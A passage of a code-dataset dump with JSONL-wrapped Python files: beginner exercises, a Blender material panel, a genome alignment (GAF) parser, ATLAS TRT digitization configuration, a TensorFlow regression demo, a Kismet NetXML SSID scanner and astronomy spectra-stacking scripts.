print(curr_sequence)\n\n\npredict_classes()\n","sub_path":"p2/p2.py","file_name":"p2.py","file_ext":"py","file_size_in_byte":7642,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"618669807","text":"def IsAscending(a):\n i = 1\n step = 1\n\n while i < len(a) and step > 0:\n step = a[i] - a[i-1]\n i += 1\n \n if step > 0:\n return \"YES\"\n else:\n return \"NO\"\n \n \na = list(map(int, input().split()))\nprint(IsAscending(a))","sub_path":"4 lesson (functions, classes)/burkova/111152.py","file_name":"111152.py","file_ext":"py","file_size_in_byte":254,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"245039755","text":"# Copyright (C) 2019 Christopher Gearhart\n# chris@bblanimation.com\n# http://bblanimation.com/\n#\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program. If not, see .\n\n# System imports\nimport bpy\nfrom bpy.props import *\nfrom bpy.types import Panel\n\n# updater import\nfrom .app_handlers import *\nfrom ..functions.common import *\nfrom .. import addon_updater_ops\n\nclass PROPERTIES_PT_abs_plastic_materials(Panel):\n bl_space_type = 'PROPERTIES'\n bl_region_type = 'WINDOW'\n bl_context = \"material\"\n bl_label = \"ABS Plastic Materials\"\n bl_idname = \"PROPERTIES_PT_abs_plastic_materials\"\n # bl_category = \"ABS Plastic Materials\"\n # COMPAT_ENGINES = {\"CYCLES\", \"BLENDER_EEVEE\"}\n\n # @classmethod\n # def poll(cls, context):\n # \"\"\" ensures operator can execute (if not, returns false) \"\"\"\n # return True\n\n def draw(self, context):\n layout = self.layout\n scn = context.scene\n\n # Call to check for update in background\n # Internally also checks to see if auto-check enabled\n # and if the time interval has passed\n addon_updater_ops.check_for_update_background()\n # draw auto-updater update box\n addon_updater_ops.update_notice_box_ui(self, context)\n\n col = layout.column(align=True)\n row = col.row(align=True)\n row.operator(\"abs.append_materials\", text=\"Import ABS Plastic Materials\", icon=\"IMPORT\")\n # row = col.row(align=True)\n # row.operator(\"abs.mark_outdated\", text=\"Mark Materials as Outdated\", icon=\"LIBRARY_DATA_OVERRIDE\" if b280() else \"GO_LEFT\")\n\n # material settings\n col = layout.column(align=True)\n col.label(text=\"Properties:\")\n row = col.row(align=True)\n row.prop(scn, \"abs_subsurf\")\n row = col.row(align=True)\n row.prop(scn, \"abs_roughness\")\n row = col.row(align=True)\n row.prop(scn, \"abs_randomize\")\n\n\n row = col.row(align=True)\n row.label(text=\"UV Details:\")\n row = col.row(align=True)\n row.prop(scn, \"uv_detail_quality\", text=\"Quality\")\n row = col.row(align=True)\n row.prop(scn, \"abs_fingerprints\")\n row = col.row(align=True)\n row.prop(scn, \"abs_displace\")\n # row = col.row(align=True)\n # row.prop(scn, \"abs_uv_scale\")\n row = col.row(align=True)\n row.prop(scn, \"save_datablocks\")\n if b280():\n row = col.row(align=True)\n row.prop(scn, \"abs_viewport_transparency\")\n","sub_path":"All_In_One/addons/abs-plastic-materials-master/ui/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3061,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"644350691","text":"N = int(input())\nS = str(input())\nans = 0\n\n# Iを000-999まで1桁ずつずらしてSの要素が左から含まれるか検証\nfor i in range(1000):\n I = str(i)\n I = I.zfill(3)\n count = 0\n for n in range(N):\n if count==0:\n if I[0]==S[n]:\n count=1\n elif count==1:\n if I[1]==S[n]:\n count=2\n elif count==2:\n if I[2]==S[n]:\n count=3\n if count==3:\n ans+=1\nprint(ans)","sub_path":"SMBC2019D.py","file_name":"SMBC2019D.py","file_ext":"py","file_size_in_byte":483,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"324298310","text":"from stack import Stack\n\ndef parChecker(par_string):\n \"\"\"\n This problem takes advantage of fact that any balanced parentheis string will have\n equal number of open '(' and close ')' parenthesis and in correct order. \n \"\"\"\n balanced = True\n length_of_par_string = len(par_string)\n i = 0\n s = Stack()\n while i < length_of_par_string and balanced:\n \"if '(' is found, '(' pushed to stack.\"\n if par_string[i] == '(':\n s.push(par_string[i])\n else:\n \"\"\"\n look for the condition where stack is empty, \n if stack is empty before the end of iteration which means\n you had unbalanced stack before end of While loop.\n unbalanced stack will execute statement below.\n \"\"\"\n if s.isEmpty():\n balanced = False\n else:\n \"\"\"\n if stack instance is not empty we have to pop \n ')'\n \"\"\"\n s.pop()\n i = i + 1\n\n if balanced and s.isEmpty():\n return True\n else:\n return False\n\nif __name__ == \"__main__\":\n print(parChecker('((()))'))\n print(parChecker('(()'))\n","sub_path":"ParChecker.py","file_name":"ParChecker.py","file_ext":"py","file_size_in_byte":1201,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"39247367","text":"#!/usr/bin/env python\nimport argparse\nimport os \nimport sys\nimport pandas as pd \nimport re\nglobal args\nfirst = True\n\ndef describe(row):\n size = \"{:.0f}kbp\".format( (row.qe - row.qs)/1000.0 )\n sm = row.r\n if (row.strand == \"+\" and row.direction == \">\") or (row.strand == \"-\" and row.direction == \"<\"):\n t = \"INS\"\n else:\n t = \"INV\"\n if(sm == args.ref and t == \"INS\"):\n return(f\"Syntenic\") \n else:\n return(\"{}_{}\".format(t, size, sm))\n\n #f1 = \"fc\"\n #f2 = \"fc\"\n #if row.strand == \"-\" : f1 = \"rc\"\n #if row.direction == \"<\": f2 = \"rc\"\n #return f\"the {f1} of {row.q}:{row.qs}-{row.qe} aligns to the {f2} of {row.r}:{row.rs}-{row.re}\"\n \n\n\n\n\ndef parse_path(row):\n global first\n row = row.copy()\n paths = re.findall(r\"(>|<)([^<>:]+):(\\d+)-(\\d+)\", row.path) \n # 100% syntenicA\n #out = {\"direction\":[], \"q\":[], \"qs\":[], \"qe\":[], \"path\":[],\"paths\":[], \"pathe\":[]}\n out = []\n if(len(paths) == 0 ):\n #print(f\"{row.q}\\t{row.qs}\\t{row.qe}\\t{row.path}\\t{row.paths}\\t{row.pathe}\\tsyntenic\")\n out.append((row.q, row.qs, row.qe, row.ql, row.path, row.paths, row.pathe, row.strand, \">\"))\n \n #print()\n #print(paths) \n # path through the graph\n first = True\n for idx, path in enumerate(paths):\n direction, ref, start, end = path[0], path[1], int(path[2]),int(path[3])\n if(idx==0):\n start = start + row.paths\n if(idx == len(paths)-1 ):\n end = end - (row.pathl - row.pathe)\n\n qs = row.qs\n qe = qs + end-start\n row.qs += end - start\n #if(row.reference == ref ):\n # status = \"syntenic\"\n #else:\n # status = \"insertion\"\n \n out.append((row.q, qs, qe, row.ql, ref, start, end, row.strand, direction))\n\n out = pd.DataFrame(out, columns=[\"q\", \"qs\", \"qe\", \"ql\", \"r\", \"rs\", \"re\", \"strand\", \"direction\"])\n out[\"description\"] = out.apply(describe, axis=1)\n #out.sort_values(by=[\"q\",\"qs\"]).to_csv(sys.stdout, sep=\"\\t\", header=first, index=False)\n out.sort_values(by=[\"q\",\"qs\"], inplace=True)\n first=False\n return(out)\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description=\"\", formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n parser.add_argument(\"infile\", help=\"positional input\")\n parser.add_argument(\"-r\", \"--ref\", help=\"Main reference sequence to compare to\", default = \"CHM13.pri__1\")\n parser.add_argument(\"-n\", \"--number\", help=\"numeric option\", type=int, default=5)\n parser.add_argument(\"-l\", \"--list\", nargs=\"*\", help=\"list with zero or more entries\")\n parser.add_argument(\"-l2\", \"--list2\", nargs=\"+\", help=\"list one or more entries\")\n parser.add_argument('-d', help=\"store args.d as true if -d\", action=\"store_true\", default=False)\n args = parser.parse_args()\n\n colnames = [\"q\", \"ql\", \"qs\", \"qe\",\"strand\", \"path\", \"pathl\", \"paths\", \"pathe\", \"matches\", \"block\", \"qual\"]\n gaf = pd.read_csv(args.infile, header=None, sep=\"\\t\").loc[: ,0:(len(colnames)-1)]; gaf.columns = colnames\n gaf[\"reference\"] = args.ref\n #print(gaf[colnames[0:7]])\n\n out = pd.concat( list(gaf.apply(parse_path, axis = 1)) )\n out.sort_values(by=[\"q\",\"qs\"]).to_csv(sys.stdout, sep=\"\\t\", header=True, index=False)\n for (q, r), group in out.groupby(by = [\"q\", \"r\"]):\n syn = group[group.description == \"Syntenic\"]\n if(r != args.ref or syn.shape[0] <= 1):\n continue\n shift = syn.shift(periods=1)\n deletions = ((syn.qs - shift.qe).abs() < 5000)\n for idx, d in enumerate(deletions):\n if(not d):\n continue\n cur = syn.iloc[idx -1]\n nxt = syn.iloc[idx]\n size = \"{:.0f}kbp\".format( (nxt.rs - cur.re)/1000 )\n #print(cur, nxt, size)\n print(f\"{cur.q}\\t{cur.qe}\\t{cur.qe}\\t{cur.ql}\\t{cur.r}\\t{cur.re}\\t{nxt.rs}\\t+\\t>\\tDEL_{size}\")\n \n\n\n\n\n\n\n","sub_path":"scripts/GAF_parsing.py","file_name":"GAF_parsing.py","file_ext":"py","file_size_in_byte":3913,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"413479039","text":"\n\nfrom xai.brain.wordbase.adjectives._surly import _SURLY\n\n#calss header\nclass _SURLIEST(_SURLY, ):\n\tdef __init__(self,): \n\t\t_SURLY.__init__(self)\n\t\tself.name = \"SURLIEST\"\n\t\tself.specie = 'adjectives'\n\t\tself.basic = \"surly\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/adjectives/_surliest.py","file_name":"_surliest.py","file_ext":"py","file_size_in_byte":245,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"294834779","text":"# Copyright (C) 2002-2020 CERN for the benefit of the ATLAS collaboration\n\nfrom AthenaCommon import CfgMgr\n# The earliest bunch crossing time for which interactions will be sent\n# to the TRT Digitization code.\ndef TRT_FirstXing():\n return -50\n\n# The latest bunch crossing time for which interactions will be sent\n# to the TRT Digitization code.\ndef TRT_LastXing():\n return 50\n\ndef getTRTRange(name=\"TRTRange\", **kwargs):\n #this is the time of the xing in ns\n kwargs.setdefault('FirstXing', TRT_FirstXing() )\n kwargs.setdefault('LastXing', TRT_LastXing() )\n kwargs.setdefault('CacheRefreshFrequency', 1.0 ) #default 0 no dataproxy reset\n kwargs.setdefault('ItemList', [\"TRTUncompressedHitCollection#TRTUncompressedHits\"] )\n from AthenaCommon import CfgMgr\n return CfgMgr.PileUpXingFolder(name, **kwargs)\n\ndef BasicTRTDigitizationTool(name, **kwargs):\n\n from AthenaCommon.Resilience import protectedInclude\n protectedInclude (\"TRT_Digitization/TRT_Digitization_CommonOptions.py\")\n kwargs.setdefault(\"PAI_Tool_Xe\", \"TRT_PAI_Process_Xe\")\n kwargs.setdefault(\"PAI_Tool_Ar\", \"TRT_PAI_Process_Ar\")\n kwargs.setdefault(\"PAI_Tool_Kr\", \"TRT_PAI_Process_Kr\")\n\n from Digitization.DigitizationFlags import digitizationFlags\n #flag from Simulation/Digitization\n if not digitizationFlags.doInDetNoise.get_Value():\n kwargs.setdefault(\"Override_noiseInSimhits\", 0)\n kwargs.setdefault(\"Override_noiseInUnhitStraws\", 0)\n #kwargs.setdefault(\"Override_useMagneticFieldMap=0)\n #TRT xenon range cut\n trtRangeCut=0.05\n if hasattr(digitizationFlags, 'TRTRangeCut'):\n trtRangeCut = digitizationFlags.TRTRangeCut.get_Value()\n kwargs.setdefault(\"Override_TrtRangeCutProperty\", trtRangeCut)\n\n # Import Beam job properties\n from AthenaCommon.BeamFlags import jobproperties\n if jobproperties.Beam.beamType == \"cosmics\" :\n kwargs.setdefault(\"PrintDigSettings\", True)\n kwargs.setdefault(\"Override_cosmicFlag\", 0)\n kwargs.setdefault(\"Override_doCosmicTimingPit\", 1)\n kwargs.setdefault(\"Override_jitterTimeOffset\", 0.)\n kwargs.setdefault(\"Override_timeCorrection\", 0)\n\n if digitizationFlags.doXingByXingPileUp():\n kwargs.setdefault(\"FirstXing\", TRT_FirstXing())\n kwargs.setdefault(\"LastXing\", TRT_LastXing())\n\n ##else:\n ## from AthenaCommon.DetFlags import DetFlags\n ## from AthenaCommon.AppMgr import ServiceMgr\n ## from PileUpComps.PileUpCompsConf import PileUpXingFolder\n ## if DetFlags.pileup.TRT_on():\n ## TRTRange = PileUpXingFolder( \"TRTRange\" )\n ## TRTRange.ItemList += [\"TRTUncompressedHitCollection#TRTUncompressedHits\"]\n ## #this is the time of the xing in ns\n ## TRTRange.FirstXing = TRT_FirstXing()\n ## TRTRange.LastXing = TRT_LastXing()\n ## TRTRange.CacheRefreshFrequency = 1.0; #default 0 no dataproxy reset\n ## # add TRTRange to known pileuo intervals\n ## ServiceMgr.PileUpMergeSvc.Intervals += [TRTRange]\n\n kwargs.setdefault(\"RandomSeedOffset\", digitizationFlags.rndmSeedOffset1.get_Value())\n return CfgMgr.TRTDigitizationTool(name,**kwargs)\n\ndef TRTDigitizationTool(name=\"TRTDigitizationTool\",**kwargs):\n from Digitization.DigitizationFlags import digitizationFlags\n if digitizationFlags.PileUpPremixing and 'OverlayMT' in digitizationFlags.experimentalDigi():\n from OverlayCommonAlgs.OverlayFlags import overlayFlags\n kwargs.setdefault(\"OutputObjectName\", overlayFlags.bkgPrefix() + \"TRT_RDOs\")\n kwargs.setdefault(\"OutputSDOName\", overlayFlags.bkgPrefix() + \"TRT_SDO_Map\")\n else:\n kwargs.setdefault(\"OutputObjectName\", \"TRT_RDOs\")\n kwargs.setdefault(\"OutputSDOName\", \"TRT_SDO_Map\")\n kwargs.setdefault(\"HardScatterSplittingMode\", 0)\n return BasicTRTDigitizationTool(name,**kwargs)\n\ndef TRTGeantinoTruthDigitizationTool(name=\"TRTGeantinoTruthDigitizationTool\",**kwargs):\n kwargs.setdefault(\"ParticleBarcodeVeto\", 0)\n return TRTDigitizationTool(name,**kwargs)\n\ndef TRTDigitizationToolHS(name=\"TRTDigitizationToolHS\",**kwargs):\n kwargs.setdefault(\"OutputObjectName\", \"TRT_RDOs\")\n kwargs.setdefault(\"OutputSDOName\", \"TRT_SDO_Map\")\n kwargs.setdefault(\"HardScatterSplittingMode\", 1)\n return BasicTRTDigitizationTool(name,**kwargs)\n\ndef TRTDigitizationToolPU(name=\"TRTDigitizationToolPU\",**kwargs):\n kwargs.setdefault(\"OutputObjectName\", \"TRT_PU_RDOs\")\n kwargs.setdefault(\"OutputSDOName\", \"TRT_PU_SDO_Map\")\n kwargs.setdefault(\"HardScatterSplittingMode\", 2)\n return BasicTRTDigitizationTool(name,**kwargs)\n\ndef TRTDigitizationToolSplitNoMergePU(name=\"TRTDigitizationToolSplitNoMergePU\",**kwargs):\n kwargs.setdefault(\"HardScatterSplittingMode\", 0)\n kwargs.setdefault(\"DataObjectName\", \"PileupTRTUncompressedHits\")\n kwargs.setdefault(\"OutputObjectName\", \"TRT_PU_RDOs\")\n kwargs.setdefault(\"OutputSDOName\", \"TRT_PU_SDO_Map\")\n kwargs.setdefault(\"Override_noiseInSimhits\", 0)\n kwargs.setdefault(\"Override_noiseInUnhitStraws\", 0)\n return BasicTRTDigitizationTool(name,**kwargs)\n\ndef TRTDigitizationHS(name=\"TRTDigitizationHS\",**kwargs):\n kwargs.setdefault(\"DigitizationTool\", \"TRTDigitizationToolHS\")\n return CfgMgr.TRTDigitization(name,**kwargs)\n\ndef TRTDigitizationPU(name=\"TRTDigitizationPU\",**kwargs):\n kwargs.setdefault(\"DigitizationTool\", \"TRTDigitizationToolPU\")\n return CfgMgr.TRTDigitization(name,**kwargs)\n\ndef TRT_OverlayDigitizationTool(name=\"TRT_OverlayDigitizationTool\",**kwargs):\n from OverlayCommonAlgs.OverlayFlags import overlayFlags\n if overlayFlags.isOverlayMT():\n kwargs.setdefault(\"OnlyUseContainerName\", False)\n kwargs.setdefault(\"OutputObjectName\", overlayFlags.sigPrefix() + \"TRT_RDOs\")\n kwargs.setdefault(\"OutputSDOName\", overlayFlags.sigPrefix() + \"TRT_SDO_Map\")\n else:\n kwargs.setdefault(\"OutputObjectName\", overlayFlags.evtStore()+\"+TRT_RDOs\")\n kwargs.setdefault(\"OutputSDOName\", overlayFlags.evtStore()+ \"+TRT_SDO_Map\")\n kwargs.setdefault(\"HardScatterSplittingMode\", 0)\n kwargs.setdefault(\"Override_getT0FromData\", 0)\n kwargs.setdefault(\"Override_noiseInSimhits\", 0)\n kwargs.setdefault(\"Override_noiseInUnhitStraws\", 0)\n kwargs.setdefault(\"Override_isOverlay\", 1)\n return BasicTRTDigitizationTool(name,**kwargs)\n\ndef TRT_OverlayDigitization(name=\"TRT_OverlayDigitization\",**kwargs):\n kwargs.setdefault(\"DigitizationTool\", \"TRT_OverlayDigitizationTool\")\n # Multi-threading settinggs\n from AthenaCommon.ConcurrencyFlags import jobproperties as concurrencyProps\n is_hive = (concurrencyProps.ConcurrencyFlags.NumThreads() > 0)\n if is_hive:\n kwargs.setdefault('Cardinality', concurrencyProps.ConcurrencyFlags.NumThreads())\n # Set common overlay extra inputs\n kwargs.setdefault(\"ExtraInputs\", [(\"McEventCollection\", \"TruthEvent\")])\n\n return CfgMgr.TRTDigitization(name,**kwargs)\n","sub_path":"InnerDetector/InDetDigitization/TRT_Digitization/python/TRT_DigitizationConfig.py","file_name":"TRT_DigitizationConfig.py","file_ext":"py","file_size_in_byte":6935,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"338504682","text":"from django.core.cache import cache\nfrom django.test import TestCase\nfrom corehq.apps.app_manager.models import Application\nfrom corehq.apps.domain.shortcuts import create_domain\nfrom couchforms.models import XFormInstance\nfrom couchforms.util import spoof_submission\n\n\nclass TestAppId(TestCase):\n def test(self):\n self.domain = 'alskdjfablasdkffsdlkfjabas'\n project = create_domain(name=self.domain)\n app = Application(domain=self.domain)\n app.save()\n app_id = app.get_id\n build = Application(domain=self.domain)\n build.copy_of = app_id\n build.save()\n build_id = build.get_id\n cache.clear()\n try:\n self._test(build_id, app_id, build_id)\n self._test(app_id, app_id, None)\n self._test('alskdjflaksdjf', 'alskdjflaksdjf', None)\n app.delete_app()\n # does this work just as well for a deleted app?\n cache.clear()\n self._test(build_id, app_id, build_id)\n build.delete_app()\n cache.clear()\n self._test(build_id, app_id, build_id)\n finally:\n project.delete()\n\n def _test(self, id, expected_app_id, expected_build_id):\n r = spoof_submission(\n '/a/{domain}/receiver/{id}/'.format(domain=self.domain, id=id),\n '',\n hqsubmission=False,\n )\n form_id = r['X-CommCareHQ-FormID']\n form = XFormInstance.get(form_id)\n self.assertEqual(form.app_id, expected_app_id)\n self.assertEqual(form.build_id, expected_build_id)\n","sub_path":"corehq/apps/receiverwrapper/tests/test_app_id.py","file_name":"test_app_id.py","file_ext":"py","file_size_in_byte":1638,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"208677218","text":"import tensorflow as tf\nfrom progress.bar import Bar\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\ndef func(x):\n return 3.1 * x + (2 + (0.125 - np.random.random() / 8.))\n\n\ndef prepare_train_data():\n x_train = np.random.random_sample(size=1000)\n y_train = [func(x) for x in x_train]\n return x_train, y_train\n\n\nx_train, y_train = prepare_train_data()\n\nplt.plot(x_train[:200], y_train[:200], 'bo')\n\n# 创建变量W, b\nW = tf.Variable(.1, dtype=tf.float32)\nb = tf.Variable(-.1, dtype=tf.float32)\n\n# 创建x节点,用来输入x_train[n]\nx = tf.placeholder(tf.float32)\n\n# 这个就是模型函数\nlinear_model = x * W + b\n\n# 创建y节点,用来输入y_train[n]\ny = tf.placeholder(tf.float32)\n\n# 创建损失函数,用于评估模型输出值与期望值差距\nloss = tf.reduce_sum(tf.square(linear_model - y))\n\n# 创建一个梯度下降优化器,学习率为0.001\noptimizer = tf.train.GradientDescentOptimizer(learning_rate=0.0001)\ntrain = optimizer.minimize(loss)\n\n# optimizer.minimize 可以转换成下面两行\n# gradients = optimizer.compute_gradients(loss)\n# train = optimizer.apply_gradients(gradients)\n\n# 初始化变量\ninit = tf.global_variables_initializer()\n\n# 训练10000次\nepochs = 10000\nwith tf.Session() as sess:\n sess.run(init)\n with Bar('Processing', max=epochs) as bar:\n for i in range(epochs):\n sess.run(train, feed_dict={x: x_train, y: y_train})\n bar.next()\n\n r_W, r_b, r_loss = sess.run([W, b, loss], {x: x_train, y: y_train})\n print('W:{0}, b: {1}, loss: {2}'.format(r_W, r_b, r_loss))\n\n seeds = np.random.random_sample(size=100)\n\n x_test = [i * W + b for i in seeds]\n y_test = [func(i) for i in seeds]\n\n x_results = sess.run(x_test)\n\n plt.plot(seeds, x_results, 'ro')\n\nplt.show()\n","sub_path":"original-tf/tf-line-func.py","file_name":"tf-line-func.py","file_ext":"py","file_size_in_byte":1784,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"136473513","text":"import pytest\nfrom aiogithubapi.objects.repository.content import AIOGitHubAPIRepositoryTreeContent\n\nfrom custom_components.racelandshop.validate.common.racelandshop_manifest import RacelandshopManifest\n\n\n@pytest.mark.asyncio\nasync def test_racelandshop_manifest_no_manifest(repository):\n check = RacelandshopManifest(repository)\n await check._async_run_check()\n assert check.failed\n\n\n@pytest.mark.asyncio\nasync def test_racelandshop_manifest_with_manifest(repository):\n repository.tree = [\n AIOGitHubAPIRepositoryTreeContent(\n {\"path\": \"racelandshop.json\", \"type\": \"file\"}, \"test/test\", \"main\"\n )\n ]\n check = RacelandshopManifest(repository)\n await check._async_run_check()\n assert not check.failed\n","sub_path":"tests/validate/common/test_hacs_manifest_check.py","file_name":"test_hacs_manifest_check.py","file_ext":"py","file_size_in_byte":749,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"566483843","text":"# !/usr/bin/python\n\n\"\"\"\nAuthor: Thomas Laurenson\nEmail: thomas@thomaslaurenson.com\nWebsite: thomaslaurenson.com\nDate: 2015/05/10\n\nDescription:\nProfile a NetXML file using the NetXML.py module and print a summary.\n\nCopyright (c) 2015, Thomas Laurenson\n\n###############################################################################\nThis program is free software: you can redistribute it and/or modify\nit under the terms of the GNU General Public License as published by\nthe Free Software Foundation, either version 3 of the License, or\n(at your option) any later version.\n\nThis program is distributed in the hope that it will be useful,\nbut WITHOUT ANY WARRANTY; without even the implied warranty of\nMERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\nGNU General Public License for more details.\n\nYou should have received a copy of the GNU General Public License\nalong with this program. If not, see .\n###############################################################################\n\n>>> CHANGELOG:\n 0.1.0 Base functionality\n\"\"\"\n\n__version__ = \"0.1.0\"\n\nimport os\nimport collections\nimport NetXML\n\n################################################################################\nif __name__==\"__main__\":\n import argparse\n parser = argparse.ArgumentParser(description='''NetXML_KnownSSIDs.py''')\n parser.add_argument(\"netxml_file\",\n help = \"Target NetXML file (e.g. Kismet-20150506-08-23-31-1.netxml)\")\n args = parser.parse_args()\n fi_in = args.netxml_file\n\n known = dict()\n known_ssids = [\"vodafone\",\"slingshot\",\"telecom\",\"thompson\",\"orcon\"]\n\n netxml = NetXML.iterparse(fi_in)\n for w in netxml:\n if isinstance(w, NetXML.WirelessNetwork) and w.ssid and w.ssid.essid:\n for k in known_ssids:\n if k in w.ssid.essid.lower():\n print(k, w.ssid.essid)\n","sub_path":"NetXML_KnownSSIDs.py","file_name":"NetXML_KnownSSIDs.py","file_ext":"py","file_size_in_byte":1901,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"361079865","text":"import time\ntimestr = time.strftime(\"%Y%m%d_%H%M%S\")\nimport datetime as dt\n\ndef find_between( s, first, last ):\n try:\n start = s.index( first ) + len( first )\n end = s.index( last, start )\n return s[start:end]\n except ValueError:\n return \"\"\n\ncompany_name_dir = r'D:\\\\COW\\\\WPA\\\\VFH\\\\UPLOAD\\\\FTP\\v-cowboy\\ETL'\nv_folder_name = r'\\v-'+find_between(company_name_dir,'v-','\\ETL')\nprint(\"v_folder_name \"+v_folder_name)\nfirst_part = company_name_dir+v_folder_name+'+'+timestr\nprint(\"first_part \"+first_part)\n\nrow = r'2018-05-27 00:38:10,580 UPLOAD2_convert_from_excel_to_csv_NEW010.py Monthly Trip Sumary Data forBilling-3.xlsx INFO D:\\\\COW\\\\WPA\\\\VFH\\\\UPLOAD\\\\FTP\\v-cowboy\\ETL\\Monthly Trip Sumary Data forBilling-3.xlsx has been converted to csv'\nif \" INFO \" in row:\n levelname = \"INFO\"\nif \" ERROR \" in row:\n levelname = \"ERROR\"\nprint(\"levelname \"+levelname)\nasctime = '2'+find_between(row,'2',' UPLOAD')\nprint(\"asctime \"+asctime)\ndatetime_object = dt.datetime.strptime(asctime, '%Y-%m-%d %H:%M:%S,%f')\nprint('datetime_object '+str(datetime_object))\nscriptname = 'UPLOAD'+find_between(row,'UPLOAD','.py')+'.py'\nprint(\"scriptname \"+scriptname)\nfilename = find_between(row,'.py ',levelname)\nprint(\"filename \"+filename)\nmessage = row.split(levelname,1)[1].lstrip(' ')\nprint(\"message \"+message)\n\nlevelname = ''\nmessage = ''\nprint('row '+row)\nwords = row.split()\nprint(words)\nnumber_of_words = len(words)\nprint('number_of_words '+str(number_of_words))\nfor index, elem in enumerate(words):\n print(index, elem)\n if index == 0:\n asctime = str(words[index])\n if index == 1:\n asctime = asctime+' '+str(words[index])\n datetime_object = dt.datetime.strptime(asctime, '%Y-%m-%d %H:%M:%S,%f')\n if index == 2:\n scriptname = str(words[index])\n if index == 3:\n filename = str(words[index])\n if index == 4:\n levelname = str(words[index])\n if index > 4:\n message = message+words[index]+' '\nif levelname == 'ERROR':\n message = 'ERROR'\nprint('datetime_object '+str(datetime_object))\nprint('scriptname '+scriptname)\nprint('filename '+filename)\nprint('levelname '+levelname)\nprint('message '+message)\n","sub_path":"WPA/VFH/python_programs/junk.py","file_name":"junk.py","file_ext":"py","file_size_in_byte":2187,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"610925064","text":"#stacking v1\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom astropy.modeling import models, fitting\nfrom astropy.io import fits\nfrom scipy import interpolate, signal\nimport os\n#import fitting\nimport sys\n# sys.path.append('C:/Users/alexw/Documents/GitHub/4th_year_project_git/Continuum fitting')\nsys.path.append('C:/Users/jason/GIT/4th_year_project_git/Continuum Fitting')\n#path for other pc sys.path.append('C:/Users/alexw/OneDrive/Documents/University work/4th year work/Main project/4th_year_project_git/Continuum fitting')\nimport fittingmethods as fitmeth\n\n#plt.style.use('mystyle') #path C:\\Users\\alexw\\AppData\\Local\\Programs\\Python\\Python37\\Lib\\site-packages\\matplotlib\\mpl-data\\stylelib\n\n#imports the spectra from the spectra folder\nspecnames = next(os.walk('Spectra'))[2]\nspectot = len(specnames)\n\nspecsample = np.array([0,1000])\n\ngcredshift = 0\ngclyalpha = 1215.67*(1+gcredshift)\nnormspeckstack = np.zeros(100000)\n\nfor specind in specsample:\n wlen, normspec, lyalpha = fitmeth.contfitv6(specind)\n # rfshift = gclyalpha - lyalpha\n wlenshift = wlen/(1+gcredshift)\n # divide here\n # wlenhighres = np.linspace(np.min(wlenshift), np.max(wlenshift), 100000)\n wlenhighres = np.linspace(3900, 9000, 100000)\n\n wlenintpol = interpolate.interp1d(wlenshift, normspec, 'linear')\n normspechighres = wlenintpol(wlenhighres)\n # print(normspechighres)\n normspeckstack = normspeckstack + normspechighres\n # print(normspeckstack)\n plt.figure()\n plt.plot(wlenshift,normspec)\n plt.plot(wlenhighres,normspechighres)\n\n # print(np.min(wlenhighres))\n # print(np.max(wlenhighres))\n\n\n#downsample stacked specind\ndsrange = np.linspace(normspeckstack[0], normspeckstack[-1],5000)\ndsnormspewcstack = signal.resample(normspeckstack, 5000)\n# dsrange = np.linspace(normspeckstack[0], normspeckstack[-1],5000)\n\n#plt.figure()\n#plt.plot(wlenhighres, normspeckstack,'.')\n\nplt.figure()\nplt.plot(wlenhighres, normspeckstack)\nplt.show()\n","sub_path":"Code and data/stacking/Alex_stacking/stacking old/stacking_V1_alex.py","file_name":"stacking_V1_alex.py","file_ext":"py","file_size_in_byte":1962,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"164143250","text":"# encoding = utf-8\n\nimport sys\nimport unittest\nimport pandas as pd\nimport time\nimport datetime\nimport multiprocessing\nimport consistency_functions\n\nimport common\nfrom agg_capture import AggregateCapture\nfrom dao.mysql_impl import DataOperationsByMysql\nfrom config.qc_config import QualityControlConfig\nfrom aux_entities.vargroup_channels import VargroupChannels\nfrom utility import time_utility as tu\n\n\ndef new_aux_objects(hour):\n # 加载单例配置对象\n my_config = QualityControlConfig()\n\n # 生成数据操作层对象\n dao = DataOperationsByMysql(my_config, hour)\n\n # 获得vargroup相关数据\n channel_df = dao.query_channels()\n aq_dict = dao.query_aq_type_in_dict()\n\n vg_c = VargroupChannels(channel_df, aq_dict)\n\n # 获得模型相关数据\n models = dao.query_consistency_model()\n\n return my_config, dao, vg_c, models\n\ndef t_agg_capture(hour):\n my_config, dao, vg_c, models = new_aux_objects(hour)\n # dev_df = dao.query_active_devices()\n dev_df = dao.query_active_devices_by_city([771])\n dfs = 